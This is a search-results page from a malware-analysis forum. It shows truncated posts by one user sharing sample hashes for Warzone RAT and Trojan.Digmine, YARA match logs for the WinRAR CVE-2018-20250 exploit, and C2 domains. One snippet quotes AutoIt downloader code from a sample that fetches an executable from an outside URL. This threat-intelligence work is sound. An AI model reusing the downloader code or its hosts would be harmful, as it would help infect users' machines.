A forum for reverse engineering, OS internals and malware analysis 

Search found 1626 matches


VirusTotal graphs about malware

 by Xylitol ¦  Tue Jun 11, 2019 2:02 pm ¦  Forum: General Discussion ¦  Topic: VirusTotal graphs about malware ¦  Replies: 1 ¦  Views: 92

Hey there, I've been playing with VirusTotal graph for some weeks. Originally I did a graph just for building a landscape of files for ATM Wall; the graph can be seen here: https://www.virustotal.com/graph/embed/g9521270d163a4778aa5bc376c0d80375b11f2d95beee484498dbdaafc989ee5f I got the idea of do...

Re: User Protection FakeCog Request

 by Xylitol ¦  Sun Jun 02, 2019 11:08 am ¦  Forum: Completed Malware Requests ¦  Topic: User Protection FakeCog Request ¦  Replies: 2 ¦  Views: 280

FakeAVHunter wrote: Wed May 29, 2019 3:53 pm fakecog aka tdss
what?

Re: Warzone RAT

 by Xylitol ¦  Sat Jun 01, 2019 7:09 pm ¦  Forum: Malware ¦  Topic: Warzone RAT ¦  Replies: 3 ¦  Views: 798

no idea what the password no needs, customers are sharing with everyone already (: a few examples (rar archives, no password): 1347b7b6df132886b310072c2920a8ca0916cb2a22f06639f39d0c301f1bffdb - 1558641511831393750_WARZONE_RAT.rar 2c4822ecc9074acadaed523b9fee38f490f8093442a7cba9f3c24f075acd8c23 - WAR...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Fri May 31, 2019 10:03 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

May: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-05-01: 9148d0c4bf8b4359cfe403bf3b2aa87a8f32bce80d0b31dcff164619fdad2cee free_pictures.ace 2019-05-02: 15d830d84a6d9f2b04c563a43e90f1bd01a6a175ffdf396ea854d1c7c56c5f6c test.rar 824ad4f2f36a8267b9c7a86b1ad825041539806d23b8a87662c0...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Wed May 01, 2019 7:36 pm ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

April: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-04-01: 6dffbbe53b14d9e9ef3b758a93244d268edb370f26b11434af0930e7ea0a98b1 test.rar 57511133930b64392eb093612c0fb707b37a7c8f9ea7f629ce138fa6eeb71911 file.rar a9e94c9d13c3aa6fb9ed9deddbf2007b43c07b68e951b4c38c10dad63bdac447 evil.r...

Re: Trojan.Digmine

 by Xylitol ¦  Tue Apr 30, 2019 3:43 am ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2329

thx, I edited the thread title according to the Trendmicro detection. Also here is another curiosity: dene.exe - 574ee5f6f38fe5b63eeb0d9bd8a7934027abf2a7b7000f79fba70e4526d94f17 - 951.0 KB Func download() Local $hdownload = InetGet("http://letask.me/test.php", "sa.exe", $inet_forcereload, $inet_downlo...

Re: AutoIt downloader/miner

 by Xylitol ¦  Sun Apr 28, 2019 7:41 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2329

Another. 8b68940459c9d22ee049e77c8ed5db77ef799ab3dedd0e7b6f75e93c49e8eed1 - 992.0 KB AnyRun has a good one about it: https://any.run/report/365167731ed69d11c2db17310e5015fc07b9d44325bf797779cff36563d9f84c/2f301ccf-e54f-4a63-8cf7-b9b43cee2799 Calling: - susu.icu - luru.icu Same design of url shorten...

Trojan.Digmine

 by Xylitol ¦  Sun Apr 28, 2019 2:23 pm ¦  Forum: Malware ¦  Topic: Trojan.Digmine ¦  Replies: 4 ¦  Views: 2329

Saw it yesterday spreading on Facebook groups with random names and packed into .bz archives. https://i.imgur.com/UsBaWK1.png I got 2 samples from that (they are in attachment): 8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB 8cb158ed001eded4d7a82847cb669b68da2fac74357aa97...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Mon Apr 01, 2019 1:27 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

March: ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP 2019-03-31: ceeb05b114d99453df04bba0138c597f4a87b446a55baf20d9d5a3f121dc7090 SMASH_Fornite_Logs.rar 027ccb2e3874e05fbaf750b2253c4044100021741abc77f720804de4040fe3a3 sdhong_exe.rar acc5c5092e3f7f7967f1827434e4c738e867e476c9e4ea8afc1...

Re: CVE-2018-20250 (WinRAR UNACEV2.DLL)

 by Xylitol ¦  Tue Mar 19, 2019 4:36 am ¦  Forum: Malware ¦  Topic: CVE-2018-20250 (WinRAR UNACEV2.DLL) ¦  Replies: 8 ¦  Views: 1446

So far the rule works well. It has also been pulled here: https://github.com/Yara-Rules/rules/blob/master/CVE_Rules/CVE-2018-20250.yar ---------- MATCH: CVE_2018_20250 : AceArchive UNACEV2_DLL_EXP FILE >>>>> C:/SBOX/temp/ace/0312885f07b5a028e64c6a2a440a8584c67adf2c0986e99447328c4bede4e102 - wincon.exe -...
